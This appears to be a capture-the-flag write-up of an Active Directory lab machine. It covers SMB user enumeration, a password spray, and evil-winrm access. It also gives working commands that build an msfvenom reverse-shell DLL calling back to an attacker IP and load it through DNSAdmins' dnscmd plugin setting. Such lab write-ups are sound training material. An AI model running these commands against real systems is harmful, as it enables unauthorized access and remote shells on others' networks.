
NETWORK

ENUMERATION
User enumeration
Enum4linux has revealled few potential users
enum4linux -a -u '' -p '' 10.10.10.169

Doing a user enumeration with crackmapexec
crackmapexec smb megabank.local -u '' -p '' --users
We have found the user marko password

Password spray
A password brute force on the list of users against the password ‘Welcome123!’ reveals that it belong to user Melanie (somehow not the user Marko)
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success

FOOTHOLD
Using the credentials found at the previous step, we are able to access to the machine using evil-winrm

PRIV ESCALATION
Findings



Looking into this file we have found the credentials for user Ryan

Abusing DNSAdmins privilege for escalation in Active Directory

Googling around the term DNSadmins, we have found https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2 which is basically creating a custom DLL which will then be run while restarting the DNS.
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=4444 -f dll > privesc.dll

We can then use the reverse.dll with dnscmd command (calling our reverse.dll from a share started on kali)
dnscmd /config /serverlevelplugindll \\10.10.16.5\kali\reverse.dll

